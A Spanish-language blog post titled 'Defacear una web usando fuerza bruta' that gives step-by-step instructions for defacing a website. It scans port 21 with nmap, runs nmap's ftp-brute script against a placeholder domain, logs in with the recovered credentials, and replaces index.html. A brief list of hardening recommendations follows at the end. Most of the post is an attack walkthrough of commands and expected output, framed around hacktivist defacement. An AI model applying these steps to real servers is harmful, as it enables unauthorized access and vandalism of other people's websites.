DEFACEAR UNA WEB USANDO FUERZA BRUTA

Posted on 25/03/2012

13



Últimamente se ven ataques por grupos hacktivistas, ya sea denegando temporalmente el servicio de una web, o defaceando la misma. El defacing es un tipo de ataque donde se tiene acceso al servidor de aplicaciones web ya sea mediante por ftp, sql injection, entre otros. En este caso mostrare como hacer un defacing por medio de ftp.

Supongamos que este es nuestro objetivo: http://www.pagina.com

Primero tenemos que saber que el servidor que contiene la pagina web tenga abierto el puerto 21, para esto usamos nmap:

./nmap -p 21 pagina.com -d

El resultado tendría que ser el siguiente:

PORT STATE SERVICE REASON
21/tcp open ftp syn-ack

Con esto sabemos que el puerto 21 esta abierto, en este caso usaremos un ataque de fuerza bruta usando nmap:

./nmap -p 21 –script=ftp-brute pagina.com -d

Con esto le decimos a nmap, que se vaya defrente al puerto 21 y luego ejecutar un script para realizar el ataque de fuerza bruta usando un diccionario de datos, y con el parámetro “d” aumentamos el detalle de visualización.

El resultado seria:

NSE:ftp-brute: Successful login: user/pass

Luego te conectas al servidor mediante ftp con sus credenciales respectivas:

ftp pagina.com 21

Buscas el directorio donde se ubique el index de la pagina, y te lo bajas:

get index.html index.html

Después editas lo que quieras que se muestre y listo, subes el archivo modificado.

put index.html

Ahora vuelves a ingresar a http://www.pagina.com y veras el cambio que realizaste.

Recomendaciones: 

  • No dejar el puerto ftp abierto en caso que no lo necesites.
  • Cambiar con frecuencia la contraseña del servidor ftp en caso que si lo uses.
  • Usar contraseñas fuertes que contengan caracteres, números, mayúsculas y minúsculas
  • No tener el servidor de base de datos en el mismo servidor de aplicaciones
  • Configurar de forma correcta el firewall.
  • Si es posible tener un IDS en tu Red.
Anuncios
Posted in: deface, nmap